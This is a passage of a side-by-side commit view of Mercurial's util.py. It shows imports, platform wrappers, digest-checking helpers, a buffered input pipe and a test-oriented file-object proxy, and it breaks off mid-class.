upstream/mercurial-mirror Commit - r39601:2dcc68c7

1

# util.py - Mercurial utility functions and platform specific implementations

1

# util.py - Mercurial utility functions and platform specific implementations

2

#

2

#

3

4

5

6

#

6

#

7

# This software may be used and distributed according to the terms of the

7

# This software may be used and distributed according to the terms of the

8

# GNU General Public License version 2 or any later version.

8

# GNU General Public License version 2 or any later version.

9

10

"""Mercurial utility functions and platform specific implementations.

10

"""Mercurial utility functions and platform specific implementations.

11

12

This contains helper routines that are independent of the SCM core and

12

This contains helper routines that are independent of the SCM core and

13

hide platform-specific details from the core.

13

hide platform-specific details from the core.

14

"""

14

"""

15

16

from __future__ import absolute_import, print_function

16

from __future__ import absolute_import, print_function

17

18

import abc

18

import abc

19

import bz2

19

import bz2

20

import collections

20

import collections

21

import contextlib

21

import contextlib

22

import errno

22

import errno

23

import gc

23

import gc

24

import hashlib

24

import hashlib

25

import itertools

25

import itertools

26

import mmap

26

import mmap

27

import os

27

import os

28

import platform as pyplatform

28

import platform as pyplatform

29

import re as remod

29

import re as remod

30

import shutil

30

import shutil

31

import socket

31

import socket

32

import stat

32

import stat

33

import sys

33

import sys

34

import time

34

import time

35

import traceback

35

import traceback

36

import warnings

36

import warnings

37

import zlib

37

import zlib

38

39

from .thirdparty import (

39

from .thirdparty import (

40

attr,

40

attr,

41

)

41

)

42

from hgdemandimport import tracing

42

from hgdemandimport import tracing

43

from . import (

43

from . import (

44

encoding,

44

encoding,

45

error,

45

error,

46

i18n,

46

i18n,

47

node as nodemod,

47

node as nodemod,

48

policy,

48

policy,

49

pycompat,

49

pycompat,

50

urllibcompat,

50

urllibcompat,

51

)

51

)

52

from .utils import (

52

from .utils import (

53

procutil,

53

procutil,

54

stringutil,

54

stringutil,

55

)

55

)

56

57

base85 = policy.importmod(r'base85')

57

base85 = policy.importmod(r'base85')

58

osutil = policy.importmod(r'osutil')

58

osutil = policy.importmod(r'osutil')

59

parsers = policy.importmod(r'parsers')

59

parsers = policy.importmod(r'parsers')

60

61

b85decode = base85.b85decode

61

b85decode = base85.b85decode

62

b85encode = base85.b85encode

62

b85encode = base85.b85encode

63

64

cookielib = pycompat.cookielib

64

cookielib = pycompat.cookielib

65

httplib = pycompat.httplib

65

httplib = pycompat.httplib

66

pickle = pycompat.pickle

66

pickle = pycompat.pickle

67

safehasattr = pycompat.safehasattr

67

safehasattr = pycompat.safehasattr

68

socketserver = pycompat.socketserver

68

socketserver = pycompat.socketserver

69

bytesio = pycompat.bytesio

69

bytesio = pycompat.bytesio

70

# TODO deprecate stringio name, as it is a lie on Python 3.

70

# TODO deprecate stringio name, as it is a lie on Python 3.

71

stringio = bytesio

71

stringio = bytesio

72

xmlrpclib = pycompat.xmlrpclib

72

xmlrpclib = pycompat.xmlrpclib

73

74

httpserver = urllibcompat.httpserver

74

httpserver = urllibcompat.httpserver

75

urlerr = urllibcompat.urlerr

75

urlerr = urllibcompat.urlerr

76

urlreq = urllibcompat.urlreq

76

urlreq = urllibcompat.urlreq

77

78

# workaround for win32mbcs

78

# workaround for win32mbcs

79

_filenamebytestr = pycompat.bytestr

79

_filenamebytestr = pycompat.bytestr

80

81

if pycompat.iswindows:

81

if pycompat.iswindows:

82

from . import windows as platform

82

from . import windows as platform

83

else:

83

else:

84

from . import posix as platform

84

from . import posix as platform

85

86

_ = i18n._

86

_ = i18n._

87

88

bindunixsocket = platform.bindunixsocket

88

bindunixsocket = platform.bindunixsocket

89

cachestat = platform.cachestat

89

cachestat = platform.cachestat

90

checkexec = platform.checkexec

90

checkexec = platform.checkexec

91

checklink = platform.checklink

91

checklink = platform.checklink

92

copymode = platform.copymode

92

copymode = platform.copymode

93

expandglobs = platform.expandglobs

93

expandglobs = platform.expandglobs

94

getfsmountpoint = platform.getfsmountpoint

94

getfsmountpoint = platform.getfsmountpoint

95

getfstype = platform.getfstype

95

getfstype = platform.getfstype

96

groupmembers = platform.groupmembers

96

groupmembers = platform.groupmembers

97

groupname = platform.groupname

97

groupname = platform.groupname

98

isexec = platform.isexec

98

isexec = platform.isexec

99

isowner = platform.isowner

99

isowner = platform.isowner

100

listdir = osutil.listdir

100

listdir = osutil.listdir

101

localpath = platform.localpath

101

localpath = platform.localpath

102

lookupreg = platform.lookupreg

102

lookupreg = platform.lookupreg

103

makedir = platform.makedir

103

makedir = platform.makedir

104

nlinks = platform.nlinks

104

nlinks = platform.nlinks

105

normpath = platform.normpath

105

normpath = platform.normpath

106

normcase = platform.normcase

106

normcase = platform.normcase

107

normcasespec = platform.normcasespec

107

normcasespec = platform.normcasespec

108

normcasefallback = platform.normcasefallback

108

normcasefallback = platform.normcasefallback

109

openhardlinks = platform.openhardlinks

109

openhardlinks = platform.openhardlinks

110

oslink = platform.oslink

110

oslink = platform.oslink

111

parsepatchoutput = platform.parsepatchoutput

111

parsepatchoutput = platform.parsepatchoutput

112

pconvert = platform.pconvert

112

pconvert = platform.pconvert

113

poll = platform.poll

113

poll = platform.poll

114

posixfile = platform.posixfile

114

posixfile = platform.posixfile

115

rename = platform.rename

115

rename = platform.rename

116

removedirs = platform.removedirs

116

removedirs = platform.removedirs

117

samedevice = platform.samedevice

117

samedevice = platform.samedevice

118

samefile = platform.samefile

118

samefile = platform.samefile

119

samestat = platform.samestat

119

samestat = platform.samestat

120

setflags = platform.setflags

120

setflags = platform.setflags

121

split = platform.split

121

split = platform.split

122

statfiles = getattr(osutil, 'statfiles', platform.statfiles)

122

statfiles = getattr(osutil, 'statfiles', platform.statfiles)

123

statisexec = platform.statisexec

123

statisexec = platform.statisexec

124

statislink = platform.statislink

124

statislink = platform.statislink

125

umask = platform.umask

125

umask = platform.umask

126

unlink = platform.unlink

126

unlink = platform.unlink

127

username = platform.username

127

username = platform.username

128

129

try:

129

try:

130

recvfds = osutil.recvfds

130

recvfds = osutil.recvfds

131

except AttributeError:

131

except AttributeError:

132

pass

132

pass

133

134

# Python compatibility

134

# Python compatibility

135

136

_notset = object()

136

_notset = object()

137

138

def bitsfrom(container):

138

def bitsfrom(container):

139

bits = 0

139

bits = 0

140

for bit in container:

140

for bit in container:

141

bits |= bit

141

bits |= bit

142

return bits

142

return bits

143

144

# python 2.6 still have deprecation warning enabled by default. We do not want

144

# python 2.6 still have deprecation warning enabled by default. We do not want

145

# to display anything to standard user so detect if we are running test and

145

# to display anything to standard user so detect if we are running test and

146

# only use python deprecation warning in this case.

146

# only use python deprecation warning in this case.

147

_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))

147

_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))

148

if _dowarn:

148

if _dowarn:

149

# explicitly unfilter our warning for python 2.7

149

# explicitly unfilter our warning for python 2.7

150

#

150

#

151

# The option of setting PYTHONWARNINGS in the test runner was investigated.

151

# The option of setting PYTHONWARNINGS in the test runner was investigated.

152

# However, module name set through PYTHONWARNINGS was exactly matched, so

152

# However, module name set through PYTHONWARNINGS was exactly matched, so

153

# we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This

153

# we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This

154

# makes the whole PYTHONWARNINGS thing useless for our usecase.

154

# makes the whole PYTHONWARNINGS thing useless for our usecase.

155

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')

155

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')

156

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')

156

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')

157

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')

157

warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')

158

if _dowarn and pycompat.ispy3:

158

if _dowarn and pycompat.ispy3:

159

# silence warning emitted by passing user string to re.sub()

159

# silence warning emitted by passing user string to re.sub()

160

warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,

160

warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,

161

r'mercurial')

161

r'mercurial')

162

warnings.filterwarnings(r'ignore', r'invalid escape sequence',

162

warnings.filterwarnings(r'ignore', r'invalid escape sequence',

163

DeprecationWarning, r'mercurial')

163

DeprecationWarning, r'mercurial')

164

# TODO: reinvent imp.is_frozen()

164

# TODO: reinvent imp.is_frozen()

165

warnings.filterwarnings(r'ignore', r'the imp module is deprecated',

165

warnings.filterwarnings(r'ignore', r'the imp module is deprecated',

166

DeprecationWarning, r'mercurial')

166

DeprecationWarning, r'mercurial')

167

168

def nouideprecwarn(msg, version, stacklevel=1):

168

def nouideprecwarn(msg, version, stacklevel=1):

169

"""Issue an python native deprecation warning

169

"""Issue an python native deprecation warning

170

171

This is a noop outside of tests, use 'ui.deprecwarn' when possible.

171

This is a noop outside of tests, use 'ui.deprecwarn' when possible.

172

"""

172

"""

173

if _dowarn:

173

if _dowarn:

174

msg += ("\n(compatibility will be dropped after Mercurial-%s,"

174

msg += ("\n(compatibility will be dropped after Mercurial-%s,"

175

" update your code.)") % version

175

" update your code.)") % version

176

warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

176

warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

177

178

DIGESTS = {

178

DIGESTS = {

179

'md5': hashlib.md5,

179

'md5': hashlib.md5,

180

'sha1': hashlib.sha1,

180

'sha1': hashlib.sha1,

181

'sha512': hashlib.sha512,

181

'sha512': hashlib.sha512,

182

}

182

}

183

# List of digest types from strongest to weakest

183

# List of digest types from strongest to weakest

184

DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

184

DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

185

186

for k in DIGESTS_BY_STRENGTH:

186

for k in DIGESTS_BY_STRENGTH:

187

assert k in DIGESTS

187

assert k in DIGESTS

188

189

class digester(object):

189

class digester(object):

190

"""helper to compute digests.

190

"""helper to compute digests.

191

192

This helper can be used to compute one or more digests given their name.

192

This helper can be used to compute one or more digests given their name.

193

194

>>> d = digester([b'md5', b'sha1'])

194

>>> d = digester([b'md5', b'sha1'])

195

>>> d.update(b'foo')

195

>>> d.update(b'foo')

196

>>> [k for k in sorted(d)]

196

>>> [k for k in sorted(d)]

197

['md5', 'sha1']

197

['md5', 'sha1']

198

>>> d[b'md5']

198

>>> d[b'md5']

199

'acbd18db4cc2f85cedef654fccc4a4d8'

199

'acbd18db4cc2f85cedef654fccc4a4d8'

200

>>> d[b'sha1']

200

>>> d[b'sha1']

201

'0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'

201

'0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'

202

>>> digester.preferred([b'md5', b'sha1'])

202

>>> digester.preferred([b'md5', b'sha1'])

203

'sha1'

203

'sha1'

204

"""

204

"""

205

206

def __init__(self, digests, s=''):

206

def __init__(self, digests, s=''):

207

self._hashes = {}

207

self._hashes = {}

208

for k in digests:

208

for k in digests:

209

if k not in DIGESTS:

209

if k not in DIGESTS:

210

raise error.Abort(_('unknown digest type: %s') % k)

210

raise error.Abort(_('unknown digest type: %s') % k)

211

self._hashes[k] = DIGESTS[k]()

211

self._hashes[k] = DIGESTS[k]()

212

if s:

212

if s:

213

self.update(s)

213

self.update(s)

214

215

def update(self, data):

215

def update(self, data):

216

for h in self._hashes.values():

216

for h in self._hashes.values():

217

h.update(data)

217

h.update(data)

218

219

def __getitem__(self, key):

219

def __getitem__(self, key):

220

if key not in DIGESTS:

220

if key not in DIGESTS:

221

raise error.Abort(_('unknown digest type: %s') % k)

221

raise error.Abort(_('unknown digest type: %s') % k)

222

return nodemod.hex(self._hashes[key].digest())

222

return nodemod.hex(self._hashes[key].digest())

223

224

def __iter__(self):

224

def __iter__(self):

225

return iter(self._hashes)

225

return iter(self._hashes)

226

227

@staticmethod

227

@staticmethod

228

def preferred(supported):

228

def preferred(supported):

229

"""returns the strongest digest type in both supported and DIGESTS."""

229

"""returns the strongest digest type in both supported and DIGESTS."""

230

231

for k in DIGESTS_BY_STRENGTH:

231

for k in DIGESTS_BY_STRENGTH:

232

if k in supported:

232

if k in supported:

233

return k

233

return k

234

return None

234

return None

235

236

class digestchecker(object):

236

class digestchecker(object):

237

"""file handle wrapper that additionally checks content against a given

237

"""file handle wrapper that additionally checks content against a given

238

size and digests.

238

size and digests.

239

240

d = digestchecker(fh, size, {'md5': '...'})

240

d = digestchecker(fh, size, {'md5': '...'})

241

242

When multiple digests are given, all of them are validated.

242

When multiple digests are given, all of them are validated.

243

"""

243

"""

244

245

def __init__(self, fh, size, digests):

245

def __init__(self, fh, size, digests):

246

self._fh = fh

246

self._fh = fh

247

self._size = size

247

self._size = size

248

self._got = 0

248

self._got = 0

249

self._digests = dict(digests)

249

self._digests = dict(digests)

250

self._digester = digester(self._digests.keys())

250

self._digester = digester(self._digests.keys())

251

252

def read(self, length=-1):

252

def read(self, length=-1):

253

content = self._fh.read(length)

253

content = self._fh.read(length)

254

self._digester.update(content)

254

self._digester.update(content)

255

self._got += len(content)

255

self._got += len(content)

256

return content

256

return content

257

258

def validate(self):

258

def validate(self):

259

if self._size != self._got:

259

if self._size != self._got:

260

raise error.Abort(_('size mismatch: expected %d, got %d') %

260

raise error.Abort(_('size mismatch: expected %d, got %d') %

261

(self._size, self._got))

261

(self._size, self._got))

262

for k, v in self._digests.items():

262

for k, v in self._digests.items():

263

if v != self._digester[k]:

263

if v != self._digester[k]:

264

# i18n: first parameter is a digest name

264

# i18n: first parameter is a digest name

265

raise error.Abort(_('%s mismatch: expected %s, got %s') %

265

raise error.Abort(_('%s mismatch: expected %s, got %s') %

266

(k, v, self._digester[k]))

266

(k, v, self._digester[k]))

267

268

try:

268

try:

269

buffer = buffer

269

buffer = buffer

270

except NameError:

270

except NameError:

271

def buffer(sliceable, offset=0, length=None):

271

def buffer(sliceable, offset=0, length=None):

272

if length is not None:

272

if length is not None:

273

return memoryview(sliceable)[offset:offset + length]

273

return memoryview(sliceable)[offset:offset + length]

274

return memoryview(sliceable)[offset:]

274

return memoryview(sliceable)[offset:]

275

276

_chunksize = 4096

276

_chunksize = 4096

277

278

class bufferedinputpipe(object):

278

class bufferedinputpipe(object):

279

"""a manually buffered input pipe

279

"""a manually buffered input pipe

280

281

Python will not let us use buffered IO and lazy reading with 'polling' at

281

Python will not let us use buffered IO and lazy reading with 'polling' at

282

the same time. We cannot probe the buffer state and select will not detect

282

the same time. We cannot probe the buffer state and select will not detect

283

that data are ready to read if they are already buffered.

283

that data are ready to read if they are already buffered.

284

285

This class let us work around that by implementing its own buffering

285

This class let us work around that by implementing its own buffering

286

(allowing efficient readline) while offering a way to know if the buffer is

286

(allowing efficient readline) while offering a way to know if the buffer is

287

empty from the output (allowing collaboration of the buffer with polling).

287

empty from the output (allowing collaboration of the buffer with polling).

288

289

This class lives in the 'util' module because it makes use of the 'os'

289

This class lives in the 'util' module because it makes use of the 'os'

290

module from the python stdlib.

290

module from the python stdlib.

291

"""

291

"""

292

def __new__(cls, fh):

292

def __new__(cls, fh):

293

# If we receive a fileobjectproxy, we need to use a variation of this

293

# If we receive a fileobjectproxy, we need to use a variation of this

294

# class that notifies observers about activity.

294

# class that notifies observers about activity.

295

if isinstance(fh, fileobjectproxy):

295

if isinstance(fh, fileobjectproxy):

296

cls = observedbufferedinputpipe

296

cls = observedbufferedinputpipe

297

298

return super(bufferedinputpipe, cls).__new__(cls)

298

return super(bufferedinputpipe, cls).__new__(cls)

299

300

def __init__(self, input):

300

def __init__(self, input):

301

self._input = input

301

self._input = input

302

self._buffer = []

302

self._buffer = []

303

self._eof = False

303

self._eof = False

304

self._lenbuf = 0

304

self._lenbuf = 0

305

306

@property

306

@property

307

def hasbuffer(self):

307

def hasbuffer(self):

308

"""True is any data is currently buffered

308

"""True is any data is currently buffered

309

310

This will be used externally a pre-step for polling IO. If there is

310

This will be used externally a pre-step for polling IO. If there is

311

already data then no polling should be set in place."""

311

already data then no polling should be set in place."""

312

return bool(self._buffer)

312

return bool(self._buffer)

313

314

@property

314

@property

315

def closed(self):

315

def closed(self):

316

return self._input.closed

316

return self._input.closed

317

318

def fileno(self):

318

def fileno(self):

319

return self._input.fileno()

319

return self._input.fileno()

320

321

def close(self):

321

def close(self):

322

return self._input.close()

322

return self._input.close()

323

324

def read(self, size):

324

def read(self, size):

325

while (not self._eof) and (self._lenbuf < size):

325

while (not self._eof) and (self._lenbuf < size):

326

self._fillbuffer()

326

self._fillbuffer()

327

return self._frombuffer(size)

327

return self._frombuffer(size)

328

329

def unbufferedread(self, size):

329

def unbufferedread(self, size):

330

if not self._eof and self._lenbuf == 0:

330

if not self._eof and self._lenbuf == 0:

331

self._fillbuffer(max(size, _chunksize))

331

self._fillbuffer(max(size, _chunksize))

332

return self._frombuffer(min(self._lenbuf, size))

332

return self._frombuffer(min(self._lenbuf, size))

333

334

def readline(self, *args, **kwargs):

334

def readline(self, *args, **kwargs):

335

if 1 < len(self._buffer):

335

if 1 < len(self._buffer):

336

# this should not happen because both read and readline end with a

336

# this should not happen because both read and readline end with a

337

# _frombuffer call that collapse it.

337

# _frombuffer call that collapse it.

338

self._buffer = [''.join(self._buffer)]

338

self._buffer = [''.join(self._buffer)]

339

self._lenbuf = len(self._buffer[0])

339

self._lenbuf = len(self._buffer[0])

340

lfi = -1

340

lfi = -1

341

if self._buffer:

341

if self._buffer:

342

lfi = self._buffer[-1].find('\n')

342

lfi = self._buffer[-1].find('\n')

343

while (not self._eof) and lfi < 0:

343

while (not self._eof) and lfi < 0:

344

self._fillbuffer()

344

self._fillbuffer()

345

if self._buffer:

345

if self._buffer:

346

lfi = self._buffer[-1].find('\n')

346

lfi = self._buffer[-1].find('\n')

347

size = lfi + 1

347

size = lfi + 1

348

if lfi < 0: # end of file

348

if lfi < 0: # end of file

349

size = self._lenbuf

349

size = self._lenbuf

350

elif 1 < len(self._buffer):

350

elif 1 < len(self._buffer):

351

# we need to take previous chunks into account

351

# we need to take previous chunks into account

352

size += self._lenbuf - len(self._buffer[-1])

352

size += self._lenbuf - len(self._buffer[-1])

353

return self._frombuffer(size)

353

return self._frombuffer(size)

354

355

def _frombuffer(self, size):

355

def _frombuffer(self, size):

356

"""return at most 'size' data from the buffer

356

"""return at most 'size' data from the buffer

357

358

The data are removed from the buffer."""

358

The data are removed from the buffer."""

359

if size == 0 or not self._buffer:

359

if size == 0 or not self._buffer:

360

return ''

360

return ''

361

buf = self._buffer[0]

361

buf = self._buffer[0]

362

if 1 < len(self._buffer):

362

if 1 < len(self._buffer):

363

buf = ''.join(self._buffer)

363

buf = ''.join(self._buffer)

364

365

data = buf[:size]

365

data = buf[:size]

366

buf = buf[len(data):]

366

buf = buf[len(data):]

367

if buf:

367

if buf:

368

self._buffer = [buf]

368

self._buffer = [buf]

369

self._lenbuf = len(buf)

369

self._lenbuf = len(buf)

370

else:

370

else:

371

self._buffer = []

371

self._buffer = []

372

self._lenbuf = 0

372

self._lenbuf = 0

373

return data

373

return data

374

375

def _fillbuffer(self, size=_chunksize):

375

def _fillbuffer(self, size=_chunksize):

376

"""read data to the buffer"""

376

"""read data to the buffer"""

377

data = os.read(self._input.fileno(), size)

377

data = os.read(self._input.fileno(), size)

378

if not data:

378

if not data:

379

self._eof = True

379

self._eof = True

380

else:

380

else:

381

self._lenbuf += len(data)

381

self._lenbuf += len(data)

382

self._buffer.append(data)

382

self._buffer.append(data)

383

384

return data

384

return data

385

386

def mmapread(fp):

386

def mmapread(fp):

387

try:

387

try:

388

fd = getattr(fp, 'fileno', lambda: fp)()

388

fd = getattr(fp, 'fileno', lambda: fp)()

389

return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)

389

return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)

390

except ValueError:

390

except ValueError:

391

# Empty files cannot be mmapped, but mmapread should still work. Check

391

# Empty files cannot be mmapped, but mmapread should still work. Check

392

# if the file is empty, and if so, return an empty buffer.

392

# if the file is empty, and if so, return an empty buffer.

393

if os.fstat(fd).st_size == 0:

393

if os.fstat(fd).st_size == 0:

394

return ''

394

return ''

395

raise

395

raise

396

397

class fileobjectproxy(object):

397

class fileobjectproxy(object):

398

"""A proxy around file objects that tells a watcher when events occur.

398

"""A proxy around file objects that tells a watcher when events occur.

399

400

This type is intended to only be used for testing purposes. Think hard

400

This type is intended to only be used for testing purposes. Think hard

401

before using it in important code.

401

before using it in important code.

402

"""

402

"""

403

__slots__ = (

403

__slots__ = (

404

r'_orig',

404

r'_orig',

405

r'_observer',

405

r'_observer',

406

)

406

)

407

408

def __init__(self, fh, observer):

408

def __init__(self, fh, observer):

409

object.__setattr__(self, r'_orig', fh)

409

object.__setattr__(self, r'_orig', fh)

410

object.__setattr__(self, r'_observer', observer)

410

object.__setattr__(self, r'_observer', observer)

411

412

def __getattribute__(self, name):

412

def __getattribute__(self, name):

413

ours = {

413

ours = {

414

r'_observer',

414

r'_observer',

415

416

# IOBase

416

# IOBase

417

r'close',

417

r'close',

418

# closed if a property

418

# closed if a property

419

r'fileno',

419

r'fileno',

420

r'flush',

420

r'flush',

421

r'isatty',

421

r'isatty',

422

r'readable',

422

r'readable',

423

r'readline',

423

r'readline',

424

r'readlines',

424

r'readlines',

425

r'seek',

425

r'seek',

426

r'seekable',

426

r'seekable',

427

r'tell',

427

r'tell',

428

r'truncate',

428

r'truncate',

429

r'writable',

429

r'writable',

430

r'writelines',

430

r'writelines',

431

# RawIOBase

431

# RawIOBase

432

r'read',

432

r'read',

433

r'readall',

433

r'readall',

434

r'readinto',

434

r'readinto',

435

r'write',

435

r'write',

436

# BufferedIOBase

436

# BufferedIOBase

437

# raw is a property

437

# raw is a property

438

r'detach',

438

r'detach',

439

# read defined above

439

# read defined above

440

r'read1',

440

r'read1',

441

# readinto defined above

441

# readinto defined above

442

# write defined above

442

# write defined above

443

}

443

}

444

445

# We only observe some methods.

445

# We only observe some methods.

446

if name in ours:

446

if name in ours:

447

return object.__getattribute__(self, name)

447

return object.__getattribute__(self, name)

448

449

return getattr(object.__getattribute__(self, r'_orig'), name)

449

return getattr(object.__getattribute__(self, r'_orig'), name)

450

451

def __nonzero__(self):

451

def __nonzero__(self):

452

return bool(object.__getattribute__(self, r'_orig'))

452

return bool(object.__getattribute__(self, r'_orig'))

453

454

__bool__ = __nonzero__

454

__bool__ = __nonzero__

455

456

def __delattr__(self, name):

456

def __delattr__(self, name):

457

return delattr(object.__getattribute__(self, r'_orig'), name)

457

return delattr(object.__getattribute__(self, r'_orig'), name)

458

459

def __setattr__(self, name, value):

459

def __setattr__(self, name, value):

460

return setattr(object.__getattribute__(self, r'_orig'), name, value)

460

return setattr(object.__getattribute__(self, r'_orig'), name, value)

461

462

def __iter__(self):

462

def __iter__(self):

463

return object.__getattribute__(self, r'_orig').__iter__()

463

return object.__getattribute__(self, r'_orig').__iter__()

464

465

def _observedcall(self, name, *args, **kwargs):

465

def _observedcall(self, name, *args, **kwargs):

466

# Call the original object.

466

# Call the original object.

467

orig = object.__getattribute__(self, r'_orig')

467

orig = object.__getattribute__(self, r'_orig')

468

res = getattr(orig, name)(*args, **kwargs)

468

res = getattr(orig, name)(*args, **kwargs)

469

470

# Call a method on the observer of the same name with arguments

470

# Call a method on the observer of the same name with arguments

471

# so it can react, log, etc.

471

# so it can react, log, etc.

472

observer = object.__getattribute__(self, r'_observer')

472

observer = object.__getattribute__(self, r'_observer')

473

fn = getattr(observer, name, None)

473

fn = getattr(observer, name, None)

474

if fn:

474

if fn:

475

fn(res, *args, **kwargs)

475

fn(res, *args, **kwargs)

476

477

return res

477

return res

478

479

def close(self, *args, **kwargs):

479

def close(self, *args, **kwargs):

480

return object.__getattribute__(self, r'_observedcall')(

480

return object.__getattribute__(self, r'_observedcall')(

481

r'close', *args, **kwargs)

481

r'close', *args, **kwargs)

482

483

def fileno(self, *args, **kwargs):

483

def fileno(self, *args, **kwargs):

484

return object.__getattribute__(self, r'_observedcall')(

484

return object.__getattribute__(self, r'_observedcall')(

485

r'fileno', *args, **kwargs)

485

r'fileno', *args, **kwargs)

486

487

def flush(self, *args, **kwargs):

487

def flush(self, *args, **kwargs):

488

return object.__getattribute__(self, r'_observedcall')(

488

return object.__getattribute__(self, r'_observedcall')(

489

r'flush', *args, **kwargs)

489

r'flush', *args, **kwargs)

490

491

def isatty(self, *args, **kwargs):

491

def isatty(self, *args, **kwargs):

492

return object.__getattribute__(self, r'_observedcall')(

492

return object.__getattribute__(self, r'_observedcall')(

493

r'isatty', *args, **kwargs)

493

r'isatty', *args, **kwargs)

494

495

def readable(self, *args, **kwargs):

495

def readable(self, *args, **kwargs):

496

return object.__getattribute__(self, r'_observedcall')(

496

return object.__getattribute__(self, r'_observedcall')(

497

r'readable', *args, **kwargs)

497

r'readable', *args, **kwargs)

498

499

def readline(self, *args, **kwargs):

499

def readline(self, *args, **kwargs):

500

return object.__getattribute__(self, r'_observedcall')(

500

return object.__getattribute__(self, r'_observedcall')(

501

r'readline', *args, **kwargs)

501

r'readline', *args, **kwargs)

502

503

def readlines(self, *args, **kwargs):

503

def readlines(self, *args, **kwargs):

504

return object.__getattribute__(self, r'_observedcall')(

504

return object.__getattribute__(self, r'_observedcall')(

505

r'readlines', *args, **kwargs)

505

r'readlines', *args, **kwargs)

506

507

def seek(self, *args, **kwargs):

507

def seek(self, *args, **kwargs):

508

return object.__getattribute__(self, r'_observedcall')(

508

return object.__getattribute__(self, r'_observedcall')(

509

r'seek', *args, **kwargs)

509

r'seek', *args, **kwargs)

510

511

def seekable(self, *args, **kwargs):

511

def seekable(self, *args, **kwargs):

512

return object.__getattribute__(self, r'_observedcall')(

512

return object.__getattribute__(self, r'_observedcall')(

513

r'seekable', *args, **kwargs)

513

r'seekable', *args, **kwargs)

514

515

def tell(self, *args, **kwargs):

515

def tell(self, *args, **kwargs):

516

return object.__getattribute__(self, r'_observedcall')(

516

return object.__getattribute__(self, r'_observedcall')(

517

r'tell', *args, **kwargs)

517

r'tell', *args, **kwargs)

518

519

def truncate(self, *args, **kwargs):

519

def truncate(self, *args, **kwargs):

520

return object.__getattribute__(self, r'_observedcall')(

520

return object.__getattribute__(self, r'_observedcall')(

521

r'truncate', *args, **kwargs)

521

r'truncate', *args, **kwargs)

522

523

def writable(self, *args, **kwargs):

523

def writable(self, *args, **kwargs):

524

return object.__getattribute__(self, r'_observedcall')(

524

return object.__getattribute__(self, r'_observedcall')(

525

r'writable', *args, **kwargs)

525

r'writable', *args, **kwargs)

526

527

def writelines(self, *args, **kwargs):

527

def writelines(self, *args, **kwargs):

528

return object.__getattribute__(self, r'_observedcall')(

528

return object.__getattribute__(self, r'_observedcall')(

529

r'writelines', *args, **kwargs)

529

r'writelines', *args, **kwargs)

530

531

def read(self, *args, **kwargs):

531

def read(self, *args, **kwargs):

532

return object.__getattribute__(self, r'_observedcall')(

532

return object.__getattribute__(self, r'_observedcall')(

533

r'read', *args, **kwargs)

533

r'read', *args, **kwargs)

534

535

def readall(self, *args, **kwargs):

535

def readall(self, *args, **kwargs):

536

return object.__getattribute__(self, r'_observedcall')(

536

return object.__getattribute__(self, r'_observedcall')(

537

r'readall', *args, **kwargs)

537

r'readall', *args, **kwargs)

538

539

def readinto(self, *args, **kwargs):

539

def readinto(self, *args, **kwargs):

540

return object.__getattribute__(self, r'_observedcall')(

540

return object.__getattribute__(self, r'_observedcall')(

541

r'readinto', *args, **kwargs)

541

r'readinto', *args, **kwargs)

542

543

def write(self, *args, **kwargs):

543

def write(self, *args, **kwargs):

544

return object.__getattribute__(self, r'_observedcall')(

544

return object.__getattribute__(self, r'_observedcall')(

545

r'write', *args, **kwargs)

545

r'write', *args, **kwargs)

546

547

def detach(self, *args, **kwargs):

547

def detach(self, *args, **kwargs):

548

return object.__getattribute__(self, r'_observedcall')(

548

return object.__getattribute__(self, r'_observedcall')(

549

r'detach', *args, **kwargs)

549

r'detach', *args, **kwargs)

550

551

def read1(self, *args, **kwargs):

551

def read1(self, *args, **kwargs):

552

return object.__getattribute__(self, r'_observedcall')(

552

return object.__getattribute__(self, r'_observedcall')(

553

r'read1', *args, **kwargs)

553

r'read1', *args, **kwargs)

554

555

class observedbufferedinputpipe(bufferedinputpipe):

555

class observedbufferedinputpipe(bufferedinputpipe):

556

"""A variation of bufferedinputpipe that is aware of fileobjectproxy.

556

"""A variation of bufferedinputpipe that is aware of fileobjectproxy.

557

558

``bufferedinputpipe`` makes low-level calls to ``os.read()`` that

558

``bufferedinputpipe`` makes low-level calls to ``os.read()`` that

559

bypass ``fileobjectproxy``. Because of this, we need to make

559

bypass ``fileobjectproxy``. Because of this, we need to make

560

``bufferedinputpipe`` aware of these operations.

560

``bufferedinputpipe`` aware of these operations.

561

562

This variation of ``bufferedinputpipe`` can notify observers about

562

This variation of ``bufferedinputpipe`` can notify observers about

563

``os.read()`` events. It also re-publishes other events, such as

563

``os.read()`` events. It also re-publishes other events, such as

564

``read()`` and ``readline()``.

564

``read()`` and ``readline()``.

565

"""

565

"""

566

def _fillbuffer(self):

566

def _fillbuffer(self):

567

res = super(observedbufferedinputpipe, self)._fillbuffer()

567

res = super(observedbufferedinputpipe, self)._fillbuffer()

568

569

fn = getattr(self._input._observer, r'osread', None)

569

fn = getattr(self._input._observer, r'osread', None)

570

if fn:

570

if fn:

571

fn(res, _chunksize)

571

fn(res, _chunksize)

572

573

return res

573

return res

574

575

# We use different observer methods because the operation isn't

575

# We use different observer methods because the operation isn't

576

# performed on the actual file object but on us.

576

# performed on the actual file object but on us.

577

def read(self, size):

577

def read(self, size):

578

res = super(observedbufferedinputpipe, self).read(size)

578

res = super(observedbufferedinputpipe, self).read(size)

579

580

fn = getattr(self._input._observer, r'bufferedread', None)

580

fn = getattr(self._input._observer, r'bufferedread', None)

581

if fn:

581

if fn:

582

fn(res, size)

582

fn(res, size)

583
